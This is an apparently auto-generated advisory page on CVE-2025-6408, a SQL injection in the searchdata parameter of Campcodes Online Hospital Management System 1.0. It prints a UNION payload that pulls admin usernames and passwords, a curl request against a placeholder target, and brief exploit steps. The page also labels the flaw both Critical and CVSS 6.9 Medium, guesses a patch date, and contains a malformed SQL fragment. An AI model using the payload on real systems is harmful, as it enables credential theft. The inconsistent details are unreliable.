Campcodes Online Hospital Management System, SQL Injection, CVE-2025-6408 (Critical)

Listen to this Post

🐢▶️ Listen🚀

How CVE-2025-6408 Works

The vulnerability exists in the `/doctor/search.php` file of Campcodes Online Hospital Management System 1.0 where improper sanitization of the `searchdata` parameter allows attackers to inject malicious SQL queries. When user-supplied input is directly concatenated into SQL statements without proper validation or parameterization, attackers can manipulate the database query. This enables unauthorized data access, modification, or deletion. The remote exploitation vector makes it particularly dangerous as attackers don’t require physical access to the system. The vulnerability scores 6.9 (MEDIUM) on CVSS 4.0 due to its network-based attack vector and low attack complexity.

DailyCVE Form

Platform: Campcodes Online Hospital
Version: 1.0
Vulnerability: SQL Injection
Severity: Critical
Date: 06/24/2025

Prediction: Patch by 07/15/2025

What Undercode Say

SELECT FROM patients WHERE name LIKE '%" . $_GET['searchdata'] . "%'

payload = "' UNION SELECT username, password FROM admin_users-- -"

curl http://target/doctor/search.php?searchdata=test%27%20UNION%20SELECT%201,2,3--%20-

How Exploit

1. Identify vulnerable endpoint (/doctor/search.php)

2. Craft SQLi payload for `searchdata` parameter

3. Execute UNION-based attack

4. Extract database information

5. Escalate privileges

Protection from this CVE

1. Parameterized queries

2. Input validation

3. WAF implementation

4. Regular updates

Impact

1. Data leakage

2. System compromise

3. Unauthorized access

4. Database manipulation

Sources:

Reported By: nvd.nist.gov
Extra Source Hub:
Undercode

Join Our Cyber World:

💬 Whatsapp | 💬 Telegram